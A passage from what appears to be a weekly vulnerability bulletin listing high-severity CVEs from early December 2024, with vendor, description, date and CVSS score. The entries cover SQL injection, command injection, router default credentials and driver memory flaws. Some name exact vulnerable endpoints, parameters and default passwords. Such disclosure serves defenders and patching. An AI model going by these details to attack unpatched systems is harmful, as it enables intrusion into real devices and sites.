An issue in Beijing Digital China Yunke Information Technology Co.Ltd v.7.2.6.120 allows a remote attacker to execute arbitrary code via the code/function/dpi/web_auth/customizable.php file | 2024-12-03 | 8.8 | CVE-2024-51114 |
| IBM--App Connect Enterprise Certified Container |
IBM App Connect Enterprise Certified Container 11.4, 11.5, 11.6, 12.0, 12.1, 12.2, and 12.3 could allow a remote authenticated attacker to execute arbitrary commands on the system by sending a specially crafted request. | 2024-12-04 | 8.8 | CVE-2024-51465 |
| ABB--ASPECT-Enterprise |
Local File Inclusion vulnerabilities allow access to sensitive system information. Affected products: ABB ASPECT - Enterprise v3.08.02; NEXUS Series v3.08.02; MATRIX Series v3.08.02 | 2024-12-05 | 8.2 | CVE-2024-51541 |
| ABB--ASPECT-Enterprise |
Configuration Download vulnerabilities allow access to dependency configuration information. Affected products: ABB ASPECT - Enterprise v3.08.02; NEXUS Series v3.08.02; MATRIX Series v3.08.02 | 2024-12-05 | 8.2 | CVE-2024-51542 |
| ABB--ASPECT-Enterprise |
Information Disclosure vulnerabilities allow access to application configuration information. Affected products: ABB ASPECT - Enterprise v3.08.02; NEXUS Series v3.08.02; MATRIX Series v3.08.02 | 2024-12-05 | 8.2 | CVE-2024-51543 |
| ABB--ASPECT-Enterprise |
Service Control vulnerabilities allow access to service restart requests and vm configuration settings. Affected products: ABB ASPECT - Enterprise v3.08.02; NEXUS Series v3.08.02; MATRIX Series v3.08.02 | 2024-12-05 | 8.2 | CVE-2024-51544 |
| simplesamlphp--saml2 |
SimpleSAMLphp SAML2 library is a PHP library for SAML2 related functionality. When loading an (untrusted) XML document, for example the SAMLResponse, it's possible to induce an XXE. This vulnerability is fixed in 4.6.14 and 5.0.0-alpha.18. | 2024-12-02 | 8.3 | CVE-2024-52806 |
| n/a--n/a |
Authenticated remote code execution (RCE) vulnerabilities affect TP-Link Archer, Deco, and Tapo series routers. A vulnerability exists in the "tmp_get_sites" function of the HomeShield functionality provided by TP-Link. This vulnerability is still exploitable without the installation or activation of the HomeShield functionality. | 2024-12-02 | 8 | CVE-2024-53375 |
| n/a--n/a |
Ever Traduora 0.20.0 and below is vulnerable to Privilege Escalation due to the use of a hard-coded JWT signing key. | 2024-12-02 | 8.8 | CVE-2024-53484 |
| n/a--n/a |
A serious vulnerability was discovered in FreePBX 17.0.19.17. FreePBX does not verify the type of uploaded files and does not restrict user access paths, allowing attackers to remotely control the FreePBX server by uploading malicious files with malicious content and accessing the default directory where the files are uploaded. This will result in particularly serious consequences. | 2024-12-02 | 8.8 | CVE-2024-53564 |
| SonicWall--SMA100 |
A vulnerability in the SonicWall SMA100 SSLVPN firmware 10.2.1.13-72sv and earlier versions mod_httprp library loaded by the Apache web server allows remote attackers to cause Stack-based buffer overflow and potentially lead to code execution. | 2024-12-05 | 8.1 | CVE-2024-53703 |
| Kiboko Labs--Watu Quiz |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Kiboko Labs Watu Quiz allows SQL Injection.This issue affects Watu Quiz: from n/a through 3.4.2. | 2024-12-02 | 8.5 | CVE-2024-53792 |
| eDoc Intelligence LLC--eDoc Easy Tables |
Cross-Site Request Forgery (CSRF) vulnerability in eDoc Intelligence LLC eDoc Easy Tables allows Blind SQL Injection.This issue affects eDoc Easy Tables: from n/a through 1.29. | 2024-12-02 | 8.2 | CVE-2024-53793 |
| brandtoss--WP Mailster |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in brandtoss WP Mailster allows Blind SQL Injection.This issue affects WP Mailster: from n/a through 1.8.16.0. | 2024-12-06 | 8.5 | CVE-2024-53807 |
| Basix--NEX-Forms Ultimate Form Builder |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Basix NEX-Forms - Ultimate Form Builder allows SQL Injection.This issue affects NEX-Forms - Ultimate Form Builder: from n/a through 8.7.8. | 2024-12-06 | 8.5 | CVE-2024-53808 |
| PINPOINT.WORLD--Pinpoint Booking System |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in PINPOINT.WORLD Pinpoint Booking System allows Blind SQL Injection.This issue affects Pinpoint Booking System: from n/a through 2.9.9.5.1. | 2024-12-06 | 8.5 | CVE-2024-53815 |
| n/a--n/a |
An issue was discovered on Victure RX1800 WiFi 6 Router (software EN_V1.0.0_r12_110933, hardware 1.0) devices. The TELNET service is enabled by default with admin/admin as default credentials and is exposed over the LAN. The allows attackers to execute arbitrary commands with root-level permissions. Device setup does not require this password to be changed during setup in order to utilize the device. (However, the TELNET password is dictated by the current GUI password.) | 2024-12-02 | 8.8 | CVE-2024-53937 |
| n/a--n/a |
An issue was discovered in Victure RX1800 WiFi 6 Router (software EN_V1.0.0_r12_110933, hardware 1.0) devices. The TELNET service is enabled by default and exposed over the LAN. The root account is accessible without a password, allowing attackers to achieve full control over the router remotely without any authentication. | 2024-12-02 | 8.8 | CVE-2024-53938 |
| n/a--n/a |
An issue was discovered in Victure RX1800 WiFi 6 Router (software EN_V1.0.0_r12_110933, hardware 1.0) devices. The /cgi-bin/luci/admin/opsw/Dual_freq_un_apple endpoint is vulnerable to command injection through the 2.4 GHz and 5 GHz name parameters, allowing an attacker to execute arbitrary commands on the device (with root-level permissions) via crafted input. | 2024-12-02 | 8.8 | CVE-2024-53939 |
| n/a--n/a |
An issue was discovered in Victure RX1800 WiFi 6 Router (software EN_V1.0.0_r12_110933, hardware 1.0) devices. Certain /cgi-bin/luci/admin endpoints are vulnerable to command injection. Attackers can exploit this by sending crafted payloads through parameters intended for the ping utility, enabling arbitrary command execution with root-level permissions on the device. | 2024-12-02 | 8.8 | CVE-2024-53940 |
| n/a--n/a |
An issue was discovered in Victure RX1800 WiFi 6 Router (software EN_V1.0.0_r12_110933, hardware 1.0) devices. A remote attacker (in proximity to a Wi-Fi network) can derive the default Wi-Fi PSK value via the last 4 octets of the BSSID. | 2024-12-02 | 8.8 | CVE-2024-53941 |
| MobSF--Mobile-Security-Framework-MobSF |
Mobile Security Framework (MobSF) is a pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis. The application allows users to upload files with scripts in the filename parameter. As a result, a malicious user can upload a script file to the system. When users in the application use the "Diff or Compare" functionality, they are affected by a Stored Cross-Site Scripting vulnerability. This vulnerability is fixed in 4.2.9. | 2024-12-03 | 8.1 | CVE-2024-53999 |
| thorsten--phpMyFAQ |
phpMyFAQ is an open source FAQ web application for PHP 8.1+ and MySQL, PostgreSQL and other databases. Prior to 4.0.0, phpMyFAQ exposes the database (ie postgreSQL) server's credential when connection to DB fails. This vulnerability is fixed in 4.0.0. | 2024-12-06 | 8.6 | CVE-2024-54141 |
| JetBrains--YouTrack |
In JetBrains YouTrack before 2024.3.51866 system takeover was possible through path traversal in plugin sandbox | 2024-12-04 | 8 | CVE-2024-54154 |
| Google--Android |
In rpc_msg_handler and related handlers of drivers/misc/mediatek/eccci/port_rpc.c, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. | 2024-12-02 | 7.8 | CVE-2018-9376 |
| Google--Android |
In gatts_process_read_by_type_req of gatt_sr.c, there is a possible information disclosure due to uninitialized data. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-12-02 | 7.5 | CVE-2018-9381 |
| Google--Android |
In store_upgrade and store_cmd of drivers/input/touchscreen/stm/ftm4_pdc.c, there are out of bound writes due to missing bounds checks or integer underflows. These could lead to escalation of privilege. | 2024-12-05 | 7.8 | CVE-2018-9388 |
| Google--Android |
In get_binary of vendor/mediatek/proprietary/hardware/connectivity/gps/gps_hal/src/data_coder.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. | 2024-12-04 | 7.8 | CVE-2018-9392 |
| Google--Android |
In procfile_write of drivers/misc/mediatek/connectivity/wlan/gen2/os/linux/gl_proc.c, there is a possible OOB write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. | 2024-12-04 | 7.8 | CVE-2018-9393 |
| Google--Android |
In mtk_p2p_wext_set_key of drivers/misc/mediatek/connectivity/wlan/gen2/os/linux/gl_p2p.c, there is a possible OOB write due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. | 2024-12-04 | 7.8 | CVE-2018-9394 |
| Google--Android |
In mtk_cfg80211_vendor_packet_keep_alive_start and mtk_cfg80211_vendor_set_config of drivers/misc/mediatek/connectivity/wlan/gen2/os/linux/gl_vendor.c, there is a possible OOB write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. | 2024-12-04 | 7.8 | CVE-2018-9395 |
| Google--Android |
In rpc_msg_handler and related handlers of drivers/misc/mediatek/eccci/port_rpc.c, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. | 2024-12-04 | 7.8 | CVE-2018-9396 |
| Google--Android |
In WMT_unlocked_ioctl of MTK WMT device driver, there is a possible OOB write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. | 2024-12-05 | 7.8 | CVE-2018-9397 |
| Google--Android |
In fm_set_stat of mediatek FM radio driver, there is a possible OOB write due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. | 2024-12-05 | 7.8 | CVE-2018-9398 |
| Google--Android |
In /proc/driver/wmt_dbg driver, there are several possible out of bounds writes. These could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. | 2024-12-05 | 7.8 | CVE-2018-9399 |
| Google--Android |
In gt1x_debug_write_proc and gt1x_tool_write of drivers/input/touchscreen/mediatek/GT1151/gt1x_generic.c and gt1x_tools.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. | 2024-12-05 | 7.8 | CVE-2018-9400 |
| Google--Android |
In the MTK_FLP_MSG_HAL_DIAG_REPORT_DATA_NTF handler of flp2hal_- interface.c, there is a possible stack buffer overflow due to a missing bounds check. This could lead to local escalation of privilege in a privileged process with System execution privileges needed. User interaction is not needed for exploitation. | 2024-12-05 | 7.8 | CVE-2018-9403 |
| Google--Android |
In oemCallback of ril.cpp, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. | 2024-12-05 | 7.8 | CVE-2018-9404 |
| Google--Android |
In gattServerSendResponseNative of com_android_bluetooth_gatt.cpp, there is a possible out of bounds stack write due to a missing bounds check. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation. | 2024-12-02 | 7.8 | CVE-2018-9414 |
| Google--Android |
In OSUInfo of OSUInfo.java, there is a possible escalation of privilege due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-12-02 | 7.8 | CVE-2018-9431 |
| Google--Android |
In __unregister_prot_hook and packet_release of af_packet.c, there is a possible use-after-free due to improper locking. This could lead to local escalation of privilege in the kernel with System execution privileges needed. User interaction is not needed for exploitation. | 2024-12-05 | 7.8 | CVE-2018-9439 |
| Google--Android |
In store_cmd of ftm4_pdc.c, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. | 2024-12-05 | 7.8 | CVE-2018-9462 |
| Google--Android |
In sw49408_irq_runtime_engine_debug of touch_sw49408.c, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. | 2024-12-05 | 7.8 | CVE-2018-9463 |
| totalsoft--Video Gallery YouTube Gallery and Vimeo Gallery |
The Video Gallery - Best WordPress YouTube Gallery Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the orderby parameter in all versions up to, and including, 2.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2024-12-06 | 7.2 | CVE-2024-10247 |
| templateinvaders--TI WooCommerce Wishlist |
The TI WooCommerce Wishlist plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wizard' function in all versions up to, and including, 2.9.1. This makes it possible for unauthenticated attackers to create new pages, modify plugin settings, and perform limited options updates. | 2024-12-04 | 7.5 | CVE-2024-10567 |
| SICK AG--SICK InspectorP61x |
Unauthenticated CROWN APIs allow access to critical functions. This leads to the accessibility of large parts of the web application without authentication. | 2024-12-06 | 7.3 | CVE-2024-10774 |
| wpkube--Authors List |
The The Authors List plugin for WordPress is vulnerable to arbitrary shortcode execution via update_authors_list_ajax AJAX action in all versions up to, and including, 2.0.4. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. | 2024-12-04 | 7.3 | CVE-2024-10952 |
| softaculous--FileOrganizer Manage WordPress and Website Files |
The FileOrganizer - Manage WordPress and Website Files plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.1.4 via the 'default_lang' parameter. This makes it possible for authenticated attackers, with Administrator-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other "safe" file types can be uploaded and included. | 2024-12-07 | 7.2 | CVE-2024-11010 |
| OpenBSD--OpenBSD |
In OpenBSD 7.4 before errata 006 and OpenBSD 7.3 before errata 020, httpd(8) is vulnerable to a NULL dereference when handling a malformed fastcgi request. | 2024-12-05 | 7.5 | CVE-2024-11148 |
| OpenBSD--OpenBSD |
In OpenBSD 7.4 before errata 014, vmm(4) did not restore GDTR limits properly on Intel (VMX) CPUs. | 2024-12-06 | 7.9 | CVE-2024-11149 |
| Rockwell Automation--Arena |
A "use after free" code execution vulnerability exists in the Rockwell Automation Arena® that could allow a threat actor to craft a DOE file and force the software to use a resource that was already used. If exploited, a threat actor could leverage this vulnerability to execute arbitrary code. To exploit this vulnerability, a legitimate user must execute the malicious code crafted by the threat actor. | 2024-12-05 | 7.8 | CVE-2024-11155 |
| Open Automation Software--Open Automation Software |
A local low-level user on the server machine with credentials to the running OAS services can create and execute a report with an rdlx file on the server system itself. Any code within the rdlx file of the report executes with SYSTEM privileges, resulting in privilege escalation. | 2024-12-06 | 7.8 | CVE-2024-11220 |
| ABB--ASPECT-Enterprise |
Fileszie Check vulnerabilities allow a malicious user to bypass size limits or overload to the product. Affected products: ABB ASPECT - Enterprise v3.08.02; NEXUS Series v3.08.02; MATRIX Series v3.08.02 | 2024-12-05 | 7.5 | CVE-2024-11316 |
| modalweb--Advanced File Manager |
The Advanced File Manager plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation via the 'class_fma_connector.php' file in all versions up to, and including, 5.2.10. This makes it possible for authenticated attackers, with Subscriber-level access and above, and granted permissions by an Administrator, to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2024-12-03 | 7.5 | CVE-2024-11391 |
| pictureplanet--Verowa Connect |
The Verowa Connect plugin for WordPress is vulnerable to SQL Injection via the 'search_string' parameter in all versions up to, and including, 3.0.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2024-12-06 | 7.5 | CVE-2024-11460 |
| nsp-code--WP Hide & Security Enhancer |
The WP Hide & Security Enhancer plugin for WordPress is vulnerable to arbitrary file contents deletion due to a missing authorization and insufficient file path validation in the file-process.php in all versions up to, and including, 2.5.1. This makes it possible for unauthenticated attackers to delete the contents of arbitrary files on the server, which can break the site or lead to data loss. | 2024-12-06 | 7.5 | CVE-2024-11585 |
| iqonicdesign--KiviCare Clinic & Patient Management System (EHR) |
The KiviCare - Clinic & Patient Management System (EHR) plugin for WordPress is vulnerable to SQL Injection via the 'visit_type[service_id]' parameter of the tax_calculated_data AJAX action in all versions up to, and including, 3.6.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2024-12-06 | 7.5 | CVE-2024-11728 |
| Drupal--Drupal Core |
A vulnerability in Drupal Core allows Excessive Allocation.This issue affects Drupal Core: from 10.2.0 before 10.2.2, from 10.1.0 before 10.1.8. | 2024-12-05 | 7.5 | CVE-2024-11941 |
| webcodingplace--Classic Addons WPBakery Page Builder |
The Classic Addons - WPBakery Page Builder plugin for WordPress is vulnerable to Limited Local PHP File Inclusion in all versions up to, and including, 3.0 via the 'style' parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, and permissions granted by an Administrator, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other "safe" file types can be uploaded and included. The vulnerability is limited to PHP files in a Windows environment. | 2024-12-04 | 7.5 | CVE-2024-11952 |
| WeDevs--WP Project Manager |
The 'Project Manager' WordPress Plugin is affected by an authenticated SQL injection vulnerability in the 'orderby' parameter in the '/pm/v2/activites' route. | 2024-12-02 | 7.7 | CVE-2024-12015 |
| D3TN GmbH--D3TN |
Double-Free Vulnerability in uD3TN BPv7 Caused by Malformed Endpoint Identifier allows remote attacker to reliably cause DoS | 2024-12-04 | 7.5 | CVE-2024-12107 |
| 1000 Projects--Library Management System |
A vulnerability was found in 1000 Projects Library Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /showbook.php. The manipulation of the argument q leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-05 | 7.3 | CVE-2024-12187 |
| 1000 Projects--Library Management System |
A vulnerability was found in 1000 Projects Library Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /brains/stu.php. The manipulation of the argument useri leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-05 | 7.3 | CVE-2024-12188 |
| PHPGurukul--Complaint Management System |
A vulnerability classified as critical has been found in PHPGurukul Complaint Management System 1.0. Affected is an unknown function of the file /admin/user-search.php. The manipulation of the argument search leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-05 | 7.3 | CVE-2024-12228 |
| PHPGurukul--Complaint Management System |
A vulnerability classified as critical was found in PHPGurukul Complaint Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/complaint-search.php. The manipulation of the argument search leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-05 | 7.3 | CVE-2024-12229 |
| PHPGurukul--Complaint Management System |
A vulnerability, which was classified as critical, has been found in PHPGurukul Complaint Management System 1.0. Affected by this issue is some unknown functionality of the file /admin/subcategory.php. The manipulation of the argument category leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-05 | 7.3 | CVE-2024-12230 |
| CodeZips--Project Management System |
A vulnerability, which was classified as critical, was found in CodeZips Project Management System 1.0. This affects an unknown part of the file /index.php. The manipulation of the argument email leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-05 | 7.3 | CVE-2024-12231 |
| code-projects--Online Notice Board |
A vulnerability was found in code-projects Online Notice Board up to 1.0 and classified as critical. This issue affects some unknown processing of the file /registration.php of the component Profile Picture Handler. The manipulation of the argument img leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-12-05 | 7.3 | CVE-2024-12233 |
| 1000 Projects--Beauty Parlour Management System |
A vulnerability was found in 1000 Projects Beauty Parlour Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /admin/edit-customer-detailed.php. The manipulation of the argument name leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well. | 2024-12-05 | 7.3 | CVE-2024-12234 |
| jonathandejong--Beautiful taxonomy filters |
The Beautiful taxonomy filters plugin for WordPress is vulnerable to SQL Injection via the 'selects[0][term]' parameter in all versions up to, and including, 2.4.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2024-12-07 | 7.5 | CVE-2024-12270 |
| MediaTek, Inc.--MT6580, MT6739, MT6761, MT6765, MT6768, MT6779, MT6781, MT6785, MT6789, MT6833, MT6835, MT6853, MT6855, MT6873, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6896, MT6897, MT6983, MT6985, MT6989, MT8321, MT8666, MT8667, MT8673, MT8678, MT8765, MT8766, MT8766R, MT8768, MT8771, MT8781, MT8786, MT8788, MT8788E, MT8791T, MT8797, MT8798, MT8863T |
In Telephony, there is a possible out of bounds read due to a missing bounds check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS09289881; Issue ID: MSV-2023. | 2024-12-02 | 7.5 | CVE-2024-20127 |
| MediaTek, Inc.--MT6580, MT6739, MT6761, MT6765, MT6768, MT6779, MT6781, MT6785, MT6789, MT6833, MT6835, MT6853, MT6855, MT6873, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6896, MT6897, MT6983, MT6985, MT6989, MT8321, MT8666, MT8667, MT8673, MT8678, MT8765, MT8766, MT8766R, MT8768, MT8771, MT8781, MT8786, MT8788, MT8788E, MT8791T, MT8797, MT8798, MT8863T |
In Telephony, there is a possible out of bounds read due to a missing bounds check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS09289881; Issue ID: MSV-2024. | 2024-12-02 | 7.5 | CVE-2024-20128 |
| MediaTek, Inc.--MT6890, MT7622, MT7915, MT7916, MT7981, MT7986 |
In wlan driver, there is a possible client disconnection due to improper handling of exceptional conditions. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: WCNCR00384543; Issue ID: MSV-1727. | 2024-12-02 | 7.5 | CVE-2024-20137 |
| MediaTek, Inc.--MT3605, MT6985, MT6989, MT6990, MT7925, MT7927, MT8195, MT8370, MT8390 |
In wlan driver, there is a possible out of bound read due to improper input validation. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08998291; Issue ID: MSV-1604. | 2024-12-02 | 7.5 | CVE-2024-20138 |
| n/a--n/a |
Buffer Overflow vulnerability in Open Robotics Robotic Operating System 2 (ROS2) navigation2- ROS2-humble and navigation 2-humble allows a local attacker to execute arbitrary code via a crafted script. | 2024-12-05 | 7.8 | CVE-2024-30963 |
| n/a--n/a |
Insecure Permissions vulnerability in Open Robotics Robotic Operating System 2 (ROS2) navigation2- ROS2-humble and navigation 2-humble allows a local attacker to execute arbitrary code via the initial_pose_sub thread created by nav2_bt_navigator | 2024-12-05 | 7.8 | CVE-2024-30964 |
| n/a--n/a |
rizin before Release v0.6.3 is vulnerable to Uncontrolled Resource Consumption via bin_pe_parse_imports, Pe_r_bin_pe_parse_var, and estimate_slide. | 2024-12-02 | 7.5 | CVE-2024-31669 |
| Qualcomm, Inc.--Snapdragon |
Transient DOS while parsing the ML IE when a beacon with common info length of the ML IE greater than the ML IE inside which this element is present. | 2024-12-02 | 7.5 | CVE-2024-33063 |
| element-hq--synapse |
Synapse is an open-source Matrix homeserver. Synapse versions before 1.106 are vulnerable to a disk fill attack, where an unauthenticated adversary can induce Synapse to download and cache large amounts of remote media. The default rate limit strategy is insufficient to mitigate this. This can lead to a denial of service, ranging from further media uploads/downloads failing to completely unavailability of the Synapse process, depending on how Synapse was deployed. Synapse 1.106 introduces a new "leaky bucket" rate limit on remote media downloads to reduce the amount of data a user can request at a time. This does not fully address the issue, but does limit an unauthenticated user's ability to request large amounts of data to be cached. | 2024-12-03 | 7.5 | CVE-2024-37302 |
| n/a--n/a |
Buffer Overflow vulnerability in Open Robotic Operating System 2 ROS2 navigation2- ROS2-humble&& navigation2-humble allows a local attacker to execute arbitrary code via a crafted .yaml file to the nav2_amcl process | 2024-12-05 | 7.3 | CVE-2024-37860 |
| n/a--n/a |
Buffer Overflow vulnerability in Open Robotic Robotic Operating System 2 ROS2 navigation2- ROS2-humble&& navigation2-humble allows a local attacker to execute arbitrary code via a crafted .yaml file to the nav2_planner process. | 2024-12-05 | 7.3 | CVE-2024-37862 |
| n/a--n/a |
Open Robotics Robotic Operating System 2 (ROS2) and Nav2 humble version was discovered to contain a use-after-free in the nav2_amcl process. This vulnerability is triggered via sending a request to change dynamic parameters. | 2024-12-05 | 7.5 | CVE-2024-38910 |
| n/a--n/a |
An issue was discovered in Samsung Mobile Processor and Wearable Processor Exynos 2100, 1280, 2200, 1330, 1380, 1480, 2400, 9110, Modem 5123, and Modem 5300. The baseband software does not properly check the length specified by the MM (Mobility Management) module, which can lead to Denial of Service. | 2024-12-02 | 7 | CVE-2024-39343 |
| SonicWall--SMA100 |
Heap-based buffer overflow vulnerability in the SonicWall SMA100 SSLVPN due to the use of strcpy. This allows remote authenticated attackers to cause Heap-based buffer overflow and potentially lead to code execution. | 2024-12-05 | 7.5 | CVE-2024-40763 |
| IBM--Cognos Controller |
IBM Cognos Controller 11.0.0 and 11.0.1 contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data. | 2024-12-03 | 7.5 | CVE-2024-41777 |
| Qualcomm, Inc.--Snapdragon |
Memory corruption when invalid input is passed to invoke GPU Headroom API call. | 2024-12-02 | 7.8 | CVE-2024-43048 |
| Qualcomm, Inc.--Snapdragon |
Memory corruption while invoking IOCTL calls from user space to set generic private command inside WLAN driver. | 2024-12-02 | 7.8 | CVE-2024-43049 |
| Qualcomm, Inc.--Snapdragon |
Memory corruption while invoking IOCTL calls from user space to issue factory test command inside WLAN driver. | 2024-12-02 | 7.8 | CVE-2024-43050 |
| Qualcomm, Inc.--Snapdragon |
Memory corruption while processing API calls to NPU with invalid input. | 2024-12-02 | 7.8 | CVE-2024-43052 |
| Qualcomm, Inc.--Snapdragon |
Memory corruption while invoking IOCTL calls from user space to read WLAN target diagnostic information. | 2024-12-02 | 7.8 | CVE-2024-43053 |
| Hitachi--Hitachi Ops Center Common Services |
Authentication credentials leakage vulnerability in Hitachi Ops Center Common Services within Hitachi Ops Center OVA. This issue affects Hitachi Ops Center Common Services: from 10.9.3-00 before 11.0.3-00; Hitachi Ops Center OVA: from 10.9.3-00 before 11.0.2-01. | 2024-12-03 | 7.1 | CVE-2024-45068 |
| SolarWinds--SolarWinds Platform |
The SolarWinds Platform was susceptible to a XSS vulnerability that affects the search and node information section of the user interface. This vulnerability requires authentication and requires user interaction. | 2024-12-04 | 7 | CVE-2024-45717 |
| Ruijie--Reyee OS |
Ruijie Reyee OS versions 2.206.x up to but not including 2.320.x uses weak credential mechanism that could allow an attacker to easily calculate MQTT credentials. | 2024-12-06 | 7.5 | CVE-2024-45722 |
| Ruijie--Reyee OS |
Ruijie Reyee OS versions 2.206.x up to but not including 2.320.x could enable an attacker to correlate a device serial number and the user's phone number and part of the email address. | 2024-12-06 | 7.5 | CVE-2024-47043 |
| IBM--AIX |
IBM AIX 7.2, 7.3 and VIOS 3.1 and 4.1 could allow a local user to execute arbitrary commands on the system due to improper neutralization of input. | 2024-12-07 | 7.8 | CVE-2024-47115 |
| Dell--NetWorker Management Console |
Dell NetWorker Management Console, version(s) 19.11, contain(s) an Improper Verification of Cryptographic Signature vulnerability. An unauthenticated attacker with local access could potentially exploit this vulnerability, leading to Code execution. | 2024-12-03 | 7.8 | CVE-2024-47476 |
| Ruijie--Reyee OS |
Ruijie Reyee OS versions 2.206.x up to but not including 2.320.x could allow an attacker to subscribe to partial possible topics in Ruijie MQTT broker, and receive partial messages being sent to and from devices. | 2024-12-06 | 7.5 | CVE-2024-47791 |
| n/a--n/a |
An issue in aedes v0.51.2 allows attackers to cause a Denial of Service(DoS) via a crafted request. | 2024-12-03 | 7.5 | CVE-2024-48080 |
| ABB--ASPECT-Enterprise |
Denial of Service vulnerabilities where found providing a potiential for device service disruptions. Affected products: ABB ASPECT - Enterprise v3.08.02; NEXUS Series v3.08.02; MATRIX Series v3.08.02 | 2024-12-05 | 7.7 | CVE-2024-48843 |
| ABB--ASPECT-Enterprise |
Denial of Service vulnerabilities where found providing a potiential for device service disruptions. Affected products: ABB ASPECT - Enterprise v3.08.02; NEXUS Series v3.08.02; MATRIX Series v3.08.02 | 2024-12-05 | 7.7 | CVE-2024-48844 |
| ABB--ASPECT-Enterprise |
Cross Site Request Forgery vulnerabilities where found providing a potiential for exposing sensitive information or changing system settings. Affected products: ABB ASPECT - Enterprise v3.08.02; NEXUS Series v3.08.02; MATRIX Series v3.08.02 | 2024-12-05 | 7.1 | CVE-2024-48846 |
| Samsung Mobile--Samsung Mobile Devices |
Improper Verification of Cryptographic Signature in SmartSwitch prior to SMR Dec-2024 Release 1 allows local attackers to install malicious applications. | 2024-12-03 | 7.1 | CVE-2024-49413 |
| Samsung Mobile--GamingHub |
Improper handling of responses in GamingHub prior to version 6.1.04.6 in Korea, 7.1.03.7 in Global allows remote attackers to launch arbitrary activity. | 2024-12-03 | 7.5 | CVE-2024-49420 |
| n/a--n/a |
An issue in kmqtt v0.2.7 allows attackers to cause a Denial of Service (DoS) via a crafted request. | 2024-12-04 | 7.5 | CVE-2024-50947 |
| n/a--n/a |
An issue in mochiMQTT v2.6.3 allows attackers to cause a Denial of Service (DoS) via a crafted request. | 2024-12-03 | 7.5 | CVE-2024-50948 |
| ABB--ASPECT-Enterprise |
